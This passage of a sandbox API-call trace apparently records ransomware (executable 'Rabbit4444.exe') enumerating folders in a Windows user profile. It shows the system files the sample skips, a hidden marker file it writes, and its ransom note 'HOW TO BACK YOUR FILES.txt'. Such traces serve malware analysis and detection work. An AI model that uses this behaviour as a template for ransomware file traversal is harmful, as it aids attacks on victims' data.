lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xef8b4999, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xeea7f909, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.646] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.646] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.646] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.646] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.646] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.646] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeea7f909, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeea7f909, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeaa5bc7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.646] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.646] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.646] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x3957349d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x3957349d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0062.646] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.646] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.646] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0062.646] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0062.647] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0062.647] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0062.647] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0062.647] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0062.647] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0062.647] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0062.647] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0062.647] lstrcpyW (in: lpString1=0x130ebd0, lpString2="AC" | out: lpString1="AC") returned="AC" [0062.647] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0062.647] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x121710 [0062.647] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x1220e8 [0062.647] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40e351b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f214ce, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x40e351b, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0062.647] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0062.647] lstrcpyW (in: lpString1=0x130ebd0, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0062.647] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122040 [0062.647] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x117ec8 [0062.647] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122048 | out: ListHead=0xf68b0, ListEntry=0x122048) returned 0x1221a8 [0062.647] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xda90ec4a, ftLastAccessTime.dwHighDateTime=0x1d336df, ftLastWriteTime.dwLowDateTime=0xda90ec4a, ftLastWriteTime.dwHighDateTime=0x1d336df, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0062.647] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.647] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.647] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0062.647] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0062.647] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0062.647] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0062.647] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0062.648] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0062.648] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0062.648] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0062.648] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0062.648] lstrcpyW (in: lpString1=0x130ebd0, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0062.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0062.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x1243c0 [0062.648] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122048 [0062.648] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f86969, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4097064, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0062.648] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0062.648] lstrcpyW (in: lpString1=0x130ebd0, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0062.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220c0 [0062.648] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x124028 [0062.648] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1220c8 | out: ListHead=0xf68b0, ListEntry=0x1220c8) returned 0x122128 [0062.648] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4097064, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1f8706e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x4097064, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0062.648] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0062.649] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0062.649] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0062.649] lstrcpyW (in: lpString1=0x130ebd0, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0062.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0062.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x122758 [0062.649] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x1220c8 [0062.649] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x7138b2cd, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0062.649] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0062.649] lstrcpyW (in: lpString1=0x130ebd0, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0062.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122260 [0062.649] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x123d48 [0062.649] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122268 | out: ListHead=0xf68b0, ListEntry=0x122268) returned 0x1222c8 [0062.649] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef652437, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xef652437, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xef652437, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0062.649] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0062.650] lstrcpyW (in: lpString1=0x130ebd0, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0062.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122100 [0062.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb4) returned 0x122f98 [0062.650] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122108 | out: ListHead=0xf68b0, ListEntry=0x122108) returned 0x122268 [0062.650] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2080ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x40bd2b0, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0062.650] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0062.650] lstrcpyW (in: lpString1=0x130ebd0, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0062.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121f80 [0062.650] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xac) returned 0x1240e0 [0062.650] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121f88 | out: ListHead=0xf68b0, ListEntry=0x121f88) returned 0x122108 [0062.650] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2080ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x40bd2b0, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0062.650] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0062.650] lstrcpyW (in: lpString1=0x130ebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.650] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.651] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.651] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.651] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.651] CloseHandle (hObject=0x27c) returned 1 [0062.651] CloseHandle (hObject=0x298) returned 1 [0062.651] GetCurrentThreadId () returned 0xd98 [0062.651] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121f88 [0062.651] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState" [0062.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1240e0 | out: hHeap=0xe0000) returned 1 [0062.651] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121f80 | out: hHeap=0xe0000) returned 1 [0062.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState" [0062.651] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\" [0062.651] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" [0062.652] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.654] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.656] FlushFileBuffers (hFile=0x298) returned 1 [0062.657] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.657] CloseHandle (hObject=0x298) returned 1 [0062.657] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState") returned 85 [0062.657] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.658] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2080ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeaa5bc7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0062.658] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.658] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.658] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.658] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.658] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40bd2b0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd2080ff3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xeeaa5bc7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.658] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.658] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.658] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.658] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.658] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.658] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeaa5bc7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeaa5bc7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeaa5bc7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.658] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.658] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.658] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeeaa5bc7, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeeaa5bc7, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeeaa5bc7, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.658] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0062.659] lstrcpyW (in: lpString1=0x130ebe4, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.659] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0062.659] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0062.659] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.659] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.659] CloseHandle (hObject=0x27c) returned 1 [0062.660] CloseHandle (hObject=0x298) returned 1 [0062.660] GetCurrentThreadId () returned 0xd98 [0062.660] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122108 [0062.660] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\SystemAppData", iMaxLength=2048 | out: 